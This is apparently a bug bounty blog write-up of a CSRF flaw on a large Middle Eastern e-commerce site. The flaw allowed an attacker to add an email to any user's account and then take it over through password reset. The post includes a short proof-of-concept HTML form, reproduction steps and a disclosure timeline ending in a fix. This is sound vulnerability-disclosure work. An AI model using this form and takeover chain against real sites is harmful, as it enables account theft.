Account Takeover of All users by Adding new Email(CSRF)

Hi All ,

Company Info : is an English-Arabic language e-commerce platform, often described as the Amazon of the Middle East.It is the largest e-commerce platform in the Arab world. On March 28, 2017, Inc. confirmed it would be acquiring for $580 million

Bug Category and reference links :
Cross Site request forgery(CSRF)
link :

Technical Details of the Bug :
CSRF takes advantage the fact that most web apps allow attackers to predict all the details of a particular action.
Because browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.

Detection of CSRF flaws is fairly easy via penetration testing or code analysis.

About : 
It was in Last September when was private program on hackerone. I started working on and found that Site was vulnerable to CSRF attacks on many different Actions. This was one of the critical action which led to Takeover the account of any user of .

<form action="" method="POST">
<input type="hidden" name="email" value="[Valid_email]">
<input type="submit" >

Steps to reproduce :
1.Change the "email" post parameter to any email address which has not already been used.
2.Save this HTML file as .html and run this in your browser.
3.You will notice that the Email address will be changed.

Browser and Versions :
Google crome
Version : 52.0.2743.116

Impact :
If Attacker is able to add New email into Victim's account then he can go to forgot password page and Request the password to newly added Email . Now Attacker can change the password from his own Email account and takeover Victim's account.

TimeLine : 
September 4th : Report send to Security Team through Hackerone
September 28th : Report Triaged by Team
September 30th : 1000$ Bounty Rewarded
Feb 2nd : The issue was resolved

I would like to Thank to team for Fixing this serious issue .
Please feel free to comment if you have any questions regarding this issue.

Thanks !
Vijay Kumar


Popular posts from this blog

Airbnb : Steal Earning of Airbnb hosts by Adding Bank Account/Payment Method (IDOR)

Email Address disclosure of all the Mozilla Add-ons Account(Indirect Object reference)

XSS+CSRF attack in Tagged using Redirect parameter(Open URL Redirection attack Possible)